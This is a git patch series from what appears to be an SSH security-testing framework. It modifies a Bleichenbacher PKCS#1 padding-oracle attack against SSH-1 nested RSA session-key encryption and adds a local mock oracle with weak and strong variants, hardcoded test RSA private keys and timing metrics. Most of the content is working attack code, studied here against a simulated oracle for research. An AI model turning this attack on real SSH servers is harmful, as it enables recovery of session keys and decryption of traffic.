2001 From: Steffen Brossler Date: Tue, 5 Dec 2023 16:04:40 +0100 Subject: [PATCH 113/176] Adding comments and metrics, adding weak and strong oracle, --- .../config/BleichenbacherCommandConfig.java | 2 +- .../attacks/impl/BleichenbacherAttacker.java | 203 ++++++++++++++++-- .../attacks/pkcs1/Bleichenbacher.java | 129 +++++++---- .../attacks/pkcs1/Pkcs1Attack.java | 2 +- .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 145 +++++++++++-- 5 files changed, 400 insertions(+), 81 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index 7f3aea6c1..645b3b6b6 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -36,7 +36,7 @@ public class BleichenbacherCommandConfig extends AttackConfig { private String encryptedSecret; @Parameter( - names = {"-cookie", "-b"}, + names = {"-cookie", "-c"}, required = false, description = "Cookie for SessionID Calculation") private String cookie; diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 000144496..64aec0459 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -15,12 +15,13 @@ import de.rub.nds.sshattacker.attacks.general.KeyFetcher; import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; import de.rub.nds.sshattacker.attacks.pkcs1.*; -import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Ssh1MockOracle; import de.rub.nds.sshattacker.attacks.response.EqualityError; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.exceptions.CryptoException; @@ -28,6 +29,7 @@ import java.io.FileOutputStream; import java.io.IOException; import java.math.BigInteger; +import java.security.InvalidKeyException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.security.interfaces.RSAPublicKey; @@ -35,6 +37,7 @@ import java.util.Arrays; import java.util.List; import java.util.Random; +import javax.crypto.NoSuchPaddingException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -161,15 +164,166 @@ public void executeAttack() { } } + // Host 2048 + CustomRsaPrivateKey hostPrivatKey = + new CustomRsaPrivateKey( + new BigInteger( + "7AAB5898AEE7C451A2A90B9DE04EC947656FAB69460FF68E1E278EA1841D" + + "A22B39CA4A4FA7CEA1B8EDCB7224C38A1659D1226D2E07AF9A7C62A305AC" + + "9DEC042FBC290443B23E24C64765DE1AD58777A522BF102B1BCC5536D794" + + "62BCBE6DB8E91CD9CF6F98F62E5031BFAA9E51C93ED900579A39C26CBB64" + + "CF7E6F998513E20B4B2A4DD36D4F6F074A0FDB04232FA6EDAB89A1B32BA5" + + "2214696BDA66C4518A73F92807DD088AB11263519885A0CD6A42B6D9EAE9" + + "EBD13241EDC4EB7205AE838A5EF7AE280D36410057B38ED05CEBA75F92AC" + + "DF40226164BB3A0C4312B65A8C2FBA85CDB7CC5F77F53C45F64409AFC460" + + "210C8EE4DAB818F009172387ED00E141", + 16), + new BigInteger( + "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" + + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" + + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" + + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" + + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" + + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" + + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" + + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" + + "3F3EE64B04888B898864B08200A9E22909", + 16)); + CustomRsaPublicKey hostPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" + + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" + + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" + + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" + + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" + + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" + + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" + + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" + + "3F3EE64B04888B898864B08200A9E22909", + 16)); + // Server 1024 + CustomRsaPrivateKey serverPrivateKey = + new CustomRsaPrivateKey( + new BigInteger( + "64F3D28624C63EC5E0A9751FDC4B2D" + + "ADC715F0DDA9D49EF91B4C5AA03483" + + "570BA8AA01151B704335A3219E7D22" + + "2FDB9777DA68F8DF8B5CDB5DB9B0C3" + + "99CF0334044E6ED09B40E754809429" + + "F6C387B7AC7BA00ECFE7AFE4D41499" + + "B2F341FBB0496C52CBE5EB1F7E64F4" + + "BF21F72B64EE0B478EAB6A0008E07A" + + "E2F52960703D0EB9", + 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)); + CustomRsaPublicKey serverPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)); + + /*// Host 1024 + CustomRsaPublicKey hostPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C6D5D18B3BDCA91AE922941730D7" + + "BFF6F959CACC67609C571CA281148B" + + "97F8CA742B85E9FABAF308E6BFED40" + + "06B639159E19CCCD3FFF4374E905B3" + + "D4FEE6B3F8867940FDAD622FF59E7E" + + "8E7801C29D5BEB6004E1F127C1B37B" + + "5BEDFF057F06FB133A21DA77B2B9FA" + + "9E4CF72740F0049B30DC1CE23EB2B7" + + "E6E92B129E1EFE67E3", + 16)); + CustomRsaPrivateKey hostPrivatKey = + new CustomRsaPrivateKey( + new BigInteger( + "0092FAA9AC0FB31CBA0CCE07C460D1" + + "8B5088A02C7E0E88E6E8A9FD2207CA" + + "ECAAF7150ABB31EBAAD84EA32C0AB7" + + "C27E5F1230CD878BCD9BE7047BE040" + + "3FD9B13624D9C822AB17C96615BB5A" + + "875D1A076D282B2E9035FAC37DB066" + + "82C8498BA624C77B0E1E2ECBE7AB5A" + + "5A0342E20C54482D149A7F37F8EF4A" + + "2C148CD3ADD6782189", + 16), + new BigInteger( + "00C6D5D18B3BDCA91AE922941730D7" + + "BFF6F959CACC67609C571CA281148B" + + "97F8CA742B85E9FABAF308E6BFED40" + + "06B639159E19CCCD3FFF4374E905B3" + + "D4FEE6B3F8867940FDAD622FF59E7E" + + "8E7801C29D5BEB6004E1F127C1B37B" + + "5BEDFF057F06FB133A21DA77B2B9FA" + + "9E4CF72740F0049B30DC1CE23EB2B7" + + "E6E92B129E1EFE67E3", + 16)); + // Server 768 Bit + CustomRsaPublicKey serverPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00CB2C65943BB603C0072D4C5AFD8B" + + "C5155D57231F02D191A079A3758BCF" + + "96E83318F0729D05437B543088D8A1" + + "73675EE40E7506EFB09EDD62C868C5" + + "27DB0768AB643AD09A7C42C6AD47DA" + + "ACE6CD53C051E26E69AF472D0CFE17" + + "322EC96499E529", + 16)); + CustomRsaPrivateKey serverPrivateKey = + new CustomRsaPrivateKey( + new BigInteger( + "00B30F82CADCC13296E7FC5D420819" + + "49EDE560A99C68208906F48D4248A1" + + "00EFCE30D9A1398FED04619390D7D3" + + "9AE0ECB7DFB6A5EC8CA6A491097680" + + "9280CB64AF1F8C8B67739CF7093B34" + + "4343419647B331CD9827953279BE6C" + + "AC31C55BA6EF01", + 16), + new BigInteger( + "00CB2C65943BB603C0072D4C5AFD8B" + + "C5155D57231F02D191A079A3758BCF" + + "96E83318F0729D05437B543088D8A1" + + "73675EE40E7506EFB09EDD62C868C5" + + "27DB0768AB643AD09A7C42C6AD47DA" + + "ACE6CD53C051E26E69AF472D0CFE17" + + "322EC96499E529", + 16));*/ /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; }*/ - getPublicKeys(); - getHostPublicKey(); - getServerPublicKey(); - + /*getPublicKeys(); + getHostPublicKey(); + getServerPublicKey(); + */ byte[] encryptedSecret; if (config.isBenchmark()) { LOGGER.info("Running in Benchmark Mode, generating encrypted Session Key"); @@ -177,6 +331,11 @@ public void executeAttack() { Random random = new Random(); byte[] sessionKey = new byte[32]; random.nextBytes(sessionKey); + /* + + ArrayConverter.hexStringToByteArray( + "d8e96a8f2facb6536f078bcee655df3bffcc4da14c45c35d6e66813a097867f6"); + */ AbstractCipher innerEncryption; AbstractCipher outerEncryption; @@ -215,22 +374,28 @@ public void executeAttack() { throw new RuntimeException(e); } - /* Ssh1MockOracle oracle = - new Ssh1MockOracle( - hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey);*/ + Ssh1MockOracle oracle = null; + try { + oracle = + new Ssh1MockOracle( + hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey); + } catch (NoSuchPaddingException | NoSuchAlgorithmException | InvalidKeyException e) { + throw new RuntimeException(e); + } - BleichenbacherOracle oracle = - new BleichenbacherOracle( - this.hostPublicKey, - this.serverPublicKey, - getSshConfig(), - counterInnerBleichenbacher, - counterOuterBleichenbacher); + /*BleichenbacherOracle oracle = + new BleichenbacherOracle( + this.hostPublicKey, + this.serverPublicKey, + getSshConfig(), + counterInnerBleichenbacher, + counterOuterBleichenbacher);*/ Bleichenbacher attacker = new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); long start = System.currentTimeMillis(); + LOGGER.info("Encrypted Secret: {}", ArrayConverter.bytesToHexString(encryptedSecret)); attacker.attack(); @@ -244,12 +409,8 @@ public void executeAttack() { BigInteger solution = attacker.getSolution(); // Trasfer big-Integer back to byte-array, remove leading 0 if present. - byte[] solutionByteArray = solution.toByteArray(); - if (solutionByteArray[0] == 0) { - byte[] tmp = new byte[solutionByteArray.length - 1]; - System.arraycopy(solutionByteArray, 1, tmp, 0, tmp.length); - solutionByteArray = tmp; - } + + byte[] solutionByteArray = ArrayConverter.bigIntegerToByteArray(solution); CONSOLE.info("Decoded Solution: " + ArrayConverter.bytesToHexString(solutionByteArray)); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index e9daa0760..52fbdadf5 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -52,6 +52,8 @@ public Bleichenbacher( super(msg, pkcsOracle); this.hostPublicKey = hostPublicKey; this.serverPublicKey = serverPublicKey; + counterInnerBleichenbacher = 0; + counterOuterBleichenbacher = 0; } /** @@ -81,6 +83,14 @@ private BigInteger ceil(BigInteger a, BigInteger b) { } } + private BigInteger manipulateCiphertext(BigInteger s, BigInteger e, BigInteger n, byte[] c) { + BigInteger exponentiated = s.modPow(e, n); + BigInteger cipher = new BigInteger(1, c); + BigInteger res = cipher.multiply(exponentiated); + + return res.mod(n); + } + /** * Searches the smallest suitable s-value for the BB-Attack * @@ -96,16 +106,21 @@ private BigInteger find_smallest_s( LOGGER.debug("Ciphertext: {} ", bytesToHex(ciphertext)); while (true) { - BigInteger exponentiated = + // (c * pow(s,e,n)) % n + /* BigInteger exponentiated = s.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); BigInteger cipher = new BigInteger(1, ciphertext); BigInteger res = cipher.multiply(exponentiated); BigInteger attempt = res.mod(rsaPublicKey.getModulus()); - try { - Thread.sleep(0); - } catch (InterruptedException e) { - throw new RuntimeException(e); - } + */ + + BigInteger attempt = + manipulateCiphertext( + s, + rsaPublicKey.getPublicExponent(), + rsaPublicKey.getModulus(), + ciphertext); + boolean oracleResult = queryOracle(attempt, false); counterOuterBleichenbacher++; @@ -136,11 +151,13 @@ private BigInteger find_smallest_s_nested( LOGGER.debug("Ciphertext: {}", bytesToHex(ciphertext)); while (true) { - BigInteger exponentiated = - s.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); - BigInteger cipher = new BigInteger(1, ciphertext); - BigInteger res = cipher.multiply(exponentiated); - BigInteger attempt = res.mod(rsaPublicKey.getModulus()); + // (c * pow(s,e,n)) % n + BigInteger attempt = + manipulateCiphertext( + s, + rsaPublicKey.getPublicExponent(), + rsaPublicKey.getModulus(), + ciphertext); BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); @@ -180,11 +197,15 @@ private BigInteger find_s_in_range_nested( lowerBound.toString(16), upperBound.toString(16)); + // ri = ceil(2 * (b * prev_s - 2 * B), n) BigInteger bTimesPrevs = upperBound.multiply(previousS); BigInteger bTimePrevsSubTwoB = bTimesPrevs.subtract(two_B); BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); while (true) { + + // si_lower = ceil(2 * B + ri * n, b) + // si_upper = ceil(3 * B + ri * n, a) BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); BigInteger si_upper = ceil(three_B.add(rITimesN), lowerBound); @@ -192,14 +213,22 @@ private BigInteger find_s_in_range_nested( for (BigInteger si = si_lower; si.compareTo(si_upper) < 0; si = si.add(BigInteger.ONE)) { - BigInteger exponentiated = + + // (c * pow(si, e, n)) % n + /* BigInteger exponentiated = si.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); BigInteger cipher = new BigInteger(1, ciphertext); BigInteger res = cipher.multiply(exponentiated); - BigInteger attempt = res.mod(rsaPublicKey.getModulus()); + BigInteger attempt = res.mod(rsaPublicKey.getModulus());*/ - BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); + BigInteger attempt = + manipulateCiphertext( + si, + rsaPublicKey.getPublicExponent(), + rsaPublicKey.getModulus(), + ciphertext); + BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); boolean oracleResult = queryOracle(encryptedAttempt, true); counterInnerBleichenbacher++; @@ -233,11 +262,15 @@ private BigInteger find_s_in_range( lowerBound.toString(16), upperBound.toString(16)); + // ri = ceil(2 * (b * prev_s - 2 * B), n) BigInteger bTimesPrevs = upperBound.multiply(previousS); BigInteger bTimePrevsSubTwoB = bTimesPrevs.subtract(two_B); BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); while (true) { + + // si_lower = ceil(2 * B + ri * n, b) + // si_upper = ceil(3 * B + ri * n, a) BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); BigInteger si_upper = ceil(three_B.add(rITimesN), lowerBound); @@ -245,11 +278,21 @@ private BigInteger find_s_in_range( for (BigInteger si = si_lower; si.compareTo(si_upper) < 0; si = si.add(BigInteger.ONE)) { - BigInteger exponentiated = + + // (c * pow(si, e, n)) % n + /* BigInteger exponentiated = si.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); BigInteger cipher = new BigInteger(1, ciphertext); BigInteger res = cipher.multiply(exponentiated); - BigInteger attempt = res.mod(rsaPublicKey.getModulus()); + BigInteger attempt = res.mod(rsaPublicKey.getModulus());*/ + + BigInteger attempt = + manipulateCiphertext( + si, + rsaPublicKey.getPublicExponent(), + rsaPublicKey.getModulus(), + ciphertext); + boolean oracleResult = queryOracle(attempt, false); counterOuterBleichenbacher++; @@ -327,6 +370,8 @@ private List updateInterval( r_upper.toString(16), upperPartForCeil.toString(16)); + LOGGER.debug("Compare:{}", r_lower.compareTo(r_upper)); + for (BigInteger r = r_lower; r.compareTo(r_upper) < 0; r = r.add(BigInteger.ONE)) { BigInteger lowerBound = chosenInterval.lower; BigInteger upperBound = chosenInterval.upper; @@ -416,16 +461,26 @@ private byte[] nestedBleichenbacher( three_B_sub_one = three_B.subtract(BigInteger.ONE); three_B_plus_one = three_B.add(BigInteger.ONE); - LOGGER.debug("inner bitsize: {}", innerBitsize); - LOGGER.debug("inner k: {}", innerK); - LOGGER.debug("B: {}", B.toString(16)); - LOGGER.debug("2B: {}", two_B.toString(16)); - LOGGER.debug("3B: {}", three_B.toString(16)); - LOGGER.debug("3B - 1 : {}", three_B_sub_one.toString(16)); - LOGGER.debug("Ciphertext: {}", ArrayConverter.bytesToHexString(innerCiphertext)); + return innerBleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey); + } + + private byte[] innerBleichenbacher( + byte[] ciphertext, + CustomRsaPublicKey innerPublicKey, + CustomRsaPublicKey outerPublicKey) { - // new ciphertext is cracked inner ciphertext - ciphertext = innerCiphertext; + int innerBitsize = innerPublicKey.getModulus().bitLength(); + int innerK = innerBitsize / 8; + + LOGGER.debug( + "bitsize: {}\nk: {}\nB: {}\n2B: {}\n3B: {}\n3B - 1: {}\nCiphertext: {}", + innerBitsize, + innerK, + B.toString(16), + two_B.toString(16), + three_B.toString(16), + three_B_sub_one.toString(16), + bytesToHex(ciphertext)); List M = new ArrayList<>(); M.add(new Interval(two_B, three_B_sub_one)); @@ -458,8 +513,7 @@ private byte[] nestedBleichenbacher( BigInteger a = M.get(0).lower; BigInteger b = M.get(0).upper; if (a.equals(b)) { - byte[] result = a.toByteArray(); - return result; + return ArrayConverter.bigIntegerToByteArray(a); } s = find_s_in_range_nested(a, b, s, ciphertext, innerPublicKey, outerPublicKey); } @@ -488,15 +542,6 @@ private byte[] bleichenbacher(byte[] ciphertext, CustomRsaPublicKey publicKey) { three_B_sub_one.toString(16), bytesToHex(ciphertext)); - /* - LOGGER.debug("bitsize: " + bitsize); - LOGGER.debug("k: " + k); - LOGGER.debug("B: " + B.toString(16)); - LOGGER.debug("2B: " + two_B.toString(16)); - LOGGER.debug("3B: " + three_B.toString(16)); - LOGGER.debug("3B - 1: " + three_B_sub_one.toString(16)); - LOGGER.debug("Ciphertext: " + bytesToHex(ciphertext));*/ - List M = new ArrayList<>(); M.add(new Interval(two_B, three_B_sub_one)); LOGGER.debug( @@ -522,8 +567,7 @@ private byte[] bleichenbacher(byte[] ciphertext, CustomRsaPublicKey publicKey) { BigInteger a = M.get(0).lower; BigInteger b = M.get(0).upper; if (a.equals(b)) { - byte[] result = a.toByteArray(); - return result; + return ArrayConverter.bigIntegerToByteArray(a); } s = find_s_in_range(a, b, s, ciphertext, publicKey); } @@ -566,7 +610,11 @@ private byte[] pkcs1Decode(byte[] encodedPayload) { } } - return Arrays.copyOfRange(encodedPayload, idx + 1, encodedPayload.length); + if (idx != 0) { + idx = idx + 1; + } + + return Arrays.copyOfRange(encodedPayload, idx, encodedPayload.length); } /** @@ -582,7 +630,8 @@ private BigInteger encryptBigInt(BigInteger attempt, CustomRsaPublicKey encrypti javaCipher.init(Cipher.ENCRYPT_MODE, encryptionKey); - return new BigInteger(javaCipher.doFinal(attempt.toByteArray())); + return new BigInteger( + javaCipher.doFinal(ArrayConverter.bigIntegerToByteArray(attempt))); } catch (InvalidKeyException | IllegalBlockSizeException diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java index 865714066..43e565d0d 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java @@ -97,7 +97,7 @@ protected boolean queryOracle(BigInteger message, BigInteger si) { * encryption give with the parameter inner */ protected boolean queryOracle(BigInteger message, boolean inner) { - byte[] msg = ArrayConverter.bigIntegerToByteArray(message, blockSize, true); + byte[] msg = ArrayConverter.bigIntegerToByteArray(message); boolean[] results = oracle.checkDoublePKCSConformity(msg); if (inner) { return results[1]; diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java index 18d825423..d7d80cef0 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -7,10 +7,12 @@ */ package de.rub.nds.sshattacker.attacks.pkcs1.oracles; +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.attacks.pkcs1.OracleException; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.tlsattacker.util.MathHelper; +import java.math.BigInteger; import java.security.InvalidKeyException; import java.security.KeyFactory; import java.security.NoSuchAlgorithmException; @@ -56,6 +58,7 @@ public Ssh1MockOracle( } int counter = 0; + long timeElapsed = 0; /** * Check the given content for PKCS-Conformity @@ -69,25 +72,80 @@ public boolean checkPKCSConformity(byte[] msg) throws OracleException { return checkDoublePKCSConformity(msg)[0]; } - /** - * Check the given content for PKCS-Conformity which double encryption. - * - * @param msg Encrypted message to check for conformity - * @return An Array for both encryption, the first entry for the outer-encryption, the second - * for the inner encryption - */ - @Override - public boolean[] checkDoublePKCSConformity(byte[] msg) { + private boolean[] oracleStrong(byte[] msg) { boolean[] oracleResult = new boolean[] {false, false}; counter++; if (counter % 500 == 0) { - LOGGER.info("[{}] Tries", counter); + LOGGER.info( + String.format( + "[%d] Tries, took per average %f ms per oracle-request, in total %s ms have gone by", + counter, (timeElapsed / (double) counter), timeElapsed), + counter, + (timeElapsed / counter), + timeElapsed); } if (isPlaintextOracle) { return new boolean[] {true, true}; } else { + long start = System.currentTimeMillis(); + if (hostPublicKey.getModulus().bitLength() > serverPublicKey.getModulus().bitLength()) { + + byte[] decrypted_byte = decryptMessage(msg, hostPrivateKey); + + if (decrypted_byte[0] == 0x00 && decrypted_byte[1] == 0x02) { + oracleResult[0] = true; + } + + if (oracleResult[0]) { + byte[] plainInput = removePCKS1Padding(decrypted_byte); + byte[] decryptedInner = decryptMessage(plainInput, serverPrivateKey); + if (decryptedInner[0] == 0x00 && decryptedInner[1] == 0x02) { + oracleResult[1] = true; + } + } + + } else { + byte[] decrypted_byte = decryptMessage(msg, serverPrivateKey); + + if (decrypted_byte[0] == 0x00 && decrypted_byte[1] == 0x02) { + oracleResult[0] = true; + } + + if (oracleResult[0]) { + byte[] plainInput = removePCKS1Padding(decrypted_byte); + byte[] decryptedInner = decryptMessage(plainInput, hostPrivateKey); + if (decryptedInner[0] == 0x00 && decryptedInner[1] == 0x02) { + oracleResult[1] = true; + } + } + } + + long finish = System.currentTimeMillis(); + timeElapsed = timeElapsed + (finish - start); + + return oracleResult; + } + } + + private boolean[] oracleWeak(byte[] msg) { + boolean[] oracleResult = new boolean[] {false, false}; + counter++; + if (counter % 500 == 0) { + LOGGER.info( + String.format( + "[%d] Tries, took per average %f ms per oracle-request, in total %s ms have gone by ", + counter, (timeElapsed / (double) counter), timeElapsed), + counter, + (timeElapsed / counter), + timeElapsed); + } + long start = System.currentTimeMillis(); + + if (isPlaintextOracle) { + return new boolean[] {true, true}; + } else { try { KeyFactory factory = KeyFactory.getInstance("RSA"); RSAPrivateKey hostPriv = @@ -103,18 +161,18 @@ public boolean[] checkDoublePKCSConformity(byte[] msg) { serverPrivateKey.getModulus(), serverPrivateKey.getPrivateExponent())); - byte[] firstStep = null; - byte[] secondStep = null; + byte[] firstStep; if (hostPublicKey.getModulus().bitLength() > serverPublicKey.getModulus().bitLength()) { + this.cipher.init(Cipher.DECRYPT_MODE, hostPriv); firstStep = cipher.doFinal(msg); oracleResult[0] = true; this.cipher.init(Cipher.DECRYPT_MODE, serverPriv); - secondStep = cipher.doFinal(firstStep); + cipher.doFinal(firstStep); oracleResult[1] = true; @@ -125,21 +183,72 @@ public boolean[] checkDoublePKCSConformity(byte[] msg) { oracleResult[0] = true; this.cipher.init(Cipher.DECRYPT_MODE, hostPriv); - secondStep = cipher.doFinal(firstStep); + cipher.doFinal(firstStep); oracleResult[1] = true; } - - LOGGER.debug(secondStep); - + long finish = System.currentTimeMillis(); + timeElapsed = timeElapsed + (finish - start); return oracleResult; } catch (IllegalBlockSizeException | BadPaddingException e) { - // LOGGER.error("Decryption error", e); + long finish = System.currentTimeMillis(); + timeElapsed = timeElapsed + (finish - start); + return oracleResult; } catch (InvalidKeyException | NoSuchAlgorithmException | InvalidKeySpecException e) { throw new RuntimeException(e); } } } + + /** + * Check the given content for PKCS-Conformity which double encryption. + * + * @param msg Encrypted message to check for conformity + * @return An Array for both encryption, the first entry for the outer-encryption, the second + * for the inner encryption + */ + @Override + public boolean[] checkDoublePKCSConformity(byte[] msg) { + /// return oracleWeak(msg); + return oracleStrong(msg); + } + + private byte[] fillUpArray(int lenght, byte[] inputArray) { + byte[] tmp = new byte[inputArray.length]; + System.arraycopy(inputArray, 0, tmp, 0, inputArray.length); + byte[] returnArray = new byte[lenght]; + System.arraycopy(tmp, 0, returnArray, lenght - tmp.length, tmp.length); + return returnArray; + } + + private byte[] decryptMessage(byte[] msg, RSAPrivateKey key) { + BigInteger msg_bigint = new BigInteger(1, msg); + BigInteger decrypted_msg = msg_bigint.modPow(key.getPrivateExponent(), key.getModulus()); + byte[] decrypted_byte = ArrayConverter.bigIntegerToByteArray(decrypted_msg); + int k = key.getModulus().bitLength() / 8; + + if (decrypted_byte.length < k) { + decrypted_byte = fillUpArray(k, decrypted_byte); + } + return decrypted_byte; + } + + private byte[] removePCKS1Padding(byte[] input) { + byte[] tmp_copy = new byte[input.length - 2]; + System.arraycopy(input, 2, tmp_copy, 0, tmp_copy.length); + int idx = 0; + for (int i = 0; i < tmp_copy.length; i++) { + if (tmp_copy[i] == 0x00) { + idx = i; + break; + } + } + + idx = idx + 1; // +1 to skip 0 too + byte[] result = new byte[tmp_copy.length - idx]; + System.arraycopy(tmp_copy, idx, result, 0, tmp_copy.length - idx); + return result; + } } From b807b6eb3e4b7400267755d7824bb2005bbe187c Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Tue, 5 Dec 2023 23:26:21 +0100 Subject: [PATCH 114/176] Adding better metric-ouptut --- .../attacks/impl/BleichenbacherAttacker.java | 11 ++++++----- .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 2 +- 2 files changed, 7 insertions(+), 6 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 64aec0459..0f197668c 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -164,7 +164,7 @@ public void executeAttack() { } } - // Host 2048 + /*// Host 2048 CustomRsaPrivateKey hostPrivatKey = new CustomRsaPrivateKey( new BigInteger( @@ -241,9 +241,9 @@ public void executeAttack() { + "C5E4CB3A9E2ECEE52BB07C33F92893" + "A5D5B6F163BE6FBC1E8E66E4666866" + "871890105EFFE1193F", - 16)); + 16));*/ - /*// Host 1024 + // Host 1024 CustomRsaPublicKey hostPublicKey = new CustomRsaPublicKey( new BigInteger("010001", 16), @@ -314,7 +314,7 @@ public void executeAttack() { + "27DB0768AB643AD09A7C42C6AD47DA" + "ACE6CD53C051E26E69AF472D0CFE17" + "322EC96499E529", - 16));*/ + 16)); /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; @@ -434,7 